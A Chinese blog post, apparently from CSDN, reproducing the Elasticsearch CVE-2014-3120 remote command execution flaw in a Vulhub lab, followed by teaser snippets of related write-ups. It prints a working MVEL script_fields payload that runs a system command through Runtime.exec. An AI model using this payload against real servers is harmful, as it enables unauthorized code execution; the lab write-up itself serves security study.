ElasticSearch(CVE-2014-3120)命令执行漏洞复现

最新推荐文章于 2024-04-11 18:34:38 发布
最新推荐文章于 2024-04-11 18:34:38 发布
阅读量1k 收藏 1
点赞数
分类专栏: 漏洞复现 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44504968/article/details/108738440
版权

ElasticSearch(CVE-2014-3120)命令执行漏洞复现

漏洞原理

老版本ElasticSearch支持传入动态脚本(MVEL)来执行一些复杂的操作,而MVEL可执行Java代码,而且没有沙盒,所以我们可以直接执行任意代码。
知识点普及:
1、Elasticsearch,是一个基于Lucene的搜索服务器。它提供了一个分布式多用户能力的全文搜索引擎,基于RESTful web接口。Elasticsearch是用Java语言开发的,并作为Apache许可条款下的开放源码发布,是一种流行的企业级搜索引擎。
2、Lucene,是apache软件基金会4 jakarta项目组的一个子项目,是一个开放源代码的全文检索引擎工具包,但它不是一个完整的全文检索引擎,而是一个全文检索引擎的架构,提供了完整的查询引擎和索引引擎,部分文本分析引擎。
3、沙盒,在计算机安全领域中是一种安全机制,为运行中的程序提供的隔离环境。通常是作为一些来源不可信、具破坏力或无法判定程序意图的程序提供实验之用。沙盒通常严格控制其中的程序所能访问的资源,所有改动对操作系统不会造成任何损失。

实验环境

一、靶机:
系统:ubuntu搭建的测试靶场
IP:192.168.88.129
二、攻击机:
系统:win10
IP:192.168.88.137

漏洞环境

启动ecshop:
在这里插入图片描述
环境启动后,可在浏览器页面成功访问
在这里插入图片描述
注:JSON是一种轻量级的数据交换格式。易于人阅读和编写。同时也易于机器解析和生成。

漏洞复现

一、用burp抓包
在这里插入图片描述
二、利用该漏洞之前,es至少需要存在一条数据,通过以下请求包创建数据:
在这里插入图片描述注:
1、利用POST方式提交数据
2、文件名字任意
3、浏览器的原生 form 表单,如果不设置 enctype 属性,那么其中Content-Type字段最终会以 application/x-www-form-urlencoded 方式提交数据。
而对于"application/x-www-form-urlencoded",其参数组织形式是"键值对"。

三、利用命令执行漏洞,将一段java代码放进去
java代码:

{
    "size": 1,
    "query": {
      "filtered": {
        "query": {
          "match_all": {}
        }
      }
    },
    "script_fields": {
        "command": {
            "script":"import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\"id\").getInputStream()).useDelimiter(\"\\\\A\").next();"
        }
    }
}

显示如下:
在这里插入图片描述
在这里插入图片描述
注:
在任意的查询字符串中增加pretty参数,会让Elasticsearch美化输出,JSON响应以便更加容易阅读。

参考链接:
https://vulhub.org/#/environments/elasticsearch/CVE-2014-3120/

俗半
关注
专栏目录
漏洞复现ElasticSearch命令执行漏洞 (CVE-2014-3120)
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
08-12 787
Elasticsearch 是一个基于 Lucene 库的搜索引擎,具有 HTTP Web 接口和无模式 JSON 文档。Elasticsearch 是用 Java 开发的,其支持 MVEL、js、Java 等语言,其老版本默认语言为 MVEL。MVEL -一个被众多 Java 项目使用的开源的表达式语言。Elasticsearch 1.2之前的版本默认配置启用了动态脚本,该脚本允许远程攻击者通过 _search 的 source 参数执行任意 MVEL 表达式和 Java 代码。...
漏洞复现】Struts2 S2-046 远程命令执行漏洞CVE-2017-5638)
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
08-14 949
CVE-2017-5638 即st2-045/st2-046漏洞,影响范围Struts 2.3.5-2.3.31,Struts 2.5-2.5.10Apache Struts是美国阿帕奇(Apache)软件基金会的一个开源项目,是一套用于创建企业级Java Web应用的开源MVC框架,主要提供两个版本框架产品,Struts 1和Struts 2。...
ElasticSearch 命令执行漏洞CVE-2014-3120
weixin_59086772的博客
01-04 1995
0x00前言 Elasticsearch是荷兰Elasticsearch公司的一套基于Lucene构建的开源分布式RESTful搜索引擎,它主要用于云计算中,并支持通过HTTP使用JSON进行数据索引。 0x01漏洞原理 ElasticSearch 1.2版本之前支持动态脚本。漏洞是通过_search方法的参数传入恶意代码,远程执行任意MVEL表达式和Java代码。 0x02影响版本 jre版本:openjdk:8-jre elasticsearch版本:v1.1.1 0x03环境搭建 do
elasticsearch CVE-2014-3120漏洞复现
qq_46804551的博客
04-22 490
搭建 docker-compose up -d 访问 your-ip:9200 搭建成功 复现 Burpsuit抓包 抓到包是这样得 首先该漏洞需要es中至少存在一条数据,所有我们需要先创建一条数据 POST /website/blog/ HTTP/1.1 Host: your-ip:9200 Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x
ElasticSearch漏洞复现
qq_63980959的博客
05-19 3322
Elasticsearch 是一个非常强大的搜索引擎。它目前被广泛地使用于各个 IT 公司。Elasticsearch 是由 Elastic 公司创建。它的代码位于 GitHub - elastic/elasticsearch: Free and Open, Distributed, RESTful Search Engine。Elasticsearch 是一个分布式、免费和开放的搜索和分析引擎,适用于所有类型的数据,包括文本、数字、地理空间、结构化和非结构化数据。
漏洞复现-CVE-2014-3120-ElasticSearch 命令执行漏洞
Kobalos的博客
10-20 482
漏洞复现-CVE-2014-3120-ElasticSearch 命令执行漏洞 漏洞原理 老版本ElasticSearch支持传入动态脚本(MVEL)来执行一些复杂的操作,而MVEL可执行Java代码,而且没有沙盒,所以我们可以直接执行任意代码。 知识点普及: 1、Elasticsearch,是一个基于Lucene的搜索服务器。它提供了一个分布式多用户能力的全文搜索引擎,基于RESTful web接口。Elasticsearch是用Java语言开发的,并作为Apache许可条款下的开放源码发布,是一种流行的
CVE漏洞复现-CVE-2014-3120-ElasticSearch 命令执行漏洞
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
04-27 712
老版本ElasticSearch支持传入动态脚本(MVEL)来执行一些复杂的操作,而MVEL可执行Java代码,而且没有沙盒,所以我们可以直接执行任意代码。进入MSF框架,search CVE-2014-3120,然后进入对应模块,设置好参数即可攻击。本次复现采用Vulhub靶场环境,需要在本地搭建Vulhub靶场。检测环境端口是否开放。
ElasticSearch 命令执行漏洞CVE-2014-3120)(1)
最新发布
2401_83974783的博客
04-11 425
经、学习笔记、源码讲义、实战项目、讲解视频,并且后续会持续更新**
CVE-2022-22965 Spring远程代码执行漏洞复现
weixin_45260839的博客
05-22 3935
CVE-2022-22965 Spring远程代码执行漏洞复现
elasticsearch 代码执行 (CVE-2014-3120)漏洞复现
weixin_42675091的博客
04-03 341
elasticsearch 代码执行 (CVE-2014-3120)漏洞复现
Elasticsearch 常见漏洞复现合集
热门推荐
寒星的博客
05-27 1万+
Elasticsearch未授权访问 一、漏洞简介 ElasticSearch 是一款Java编写的企业级搜索服务,启动此服务默认会开放HTTP-9200端口,可被非法操作数据。 二、影响版本 ALL 三、复现过程 复现环境 vulhub 复现步骤 安装了river之后可以同步多种数据库数据(包括关系型的mysql、mongodb等)。 http://xxxxxxxx:9200/_cat/indices 里面的indices包含了_river一般就是安装了river了。 http://xxxxxxxx:9.
利用Vulnhub复现漏洞 - ElasticSearch 命令执行漏洞CVE-2014-3120)测试环境
JiangBuLiu的博客
07-02 2545
ElasticSearch 命令执行漏洞CVE-2014-3120)测试环境Vulnhub官方复现教程漏洞原理复现漏洞启动环境漏洞复现处理办法 Vulnhub官方复现教程 https://vulhub.org/#/environments/elasticsearch/CVE-2014-3120/ 漏洞原理 相关文档:http://bouk.co/blog/elasticsearch-rce/ 、...
buuctf [ElasticSearch]CVE-2014-3120
qq_1873822的博客
03-26 236
漏洞描述 老版本ElasticSearch支持传入动态脚本(MVEL)来执行一些复杂的操作,而MVEL可执行Java代码,而且没有沙盒,所以我们可以直接执行任意代码。 漏洞影响 elasticsearch版本:v1.1.1 复现过程 将Java代码放入json中 { "size": 1, "query": { "filtered": { "query": { "match_all": { } }
vulhub-CVE-2014-3120
qq_42728977的博客
12-18 338
ElasticSearch 命令执行漏洞 CVE-2014-3120背景知识ElasticSearch是什么?漏洞原理复现传????反弹shell参考 背景知识 ElasticSearch是什么? ElasticSearch是一个基于Lucene构建的开源,分布式,RESTful搜索引擎。设计用于云计算中,能够达到实时搜索,稳定,可靠,快速,安装使用方便。支持通过HTTP使用JSON进行数据索引。 说人话。。。 在日常开发中,数据库也能做到(实时、存储、搜索、分析)。 相对于数据库,Elasticsearc
CVE-2014-3120命令执行漏洞
浅笑996的博客
11-21 2501
环境配置 启动docker环境 cd vulhub-master/elasticsearch/CVE-2014-3120/ sudo docker-compose up 9200 端口已开启 访问目标的9200,会出现Elasticsearch的信息: 利用该漏洞要求Elasticsearch中有数据,所以先创建一条数据,采用Burp发送数据包: POST /website/blog/ H...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值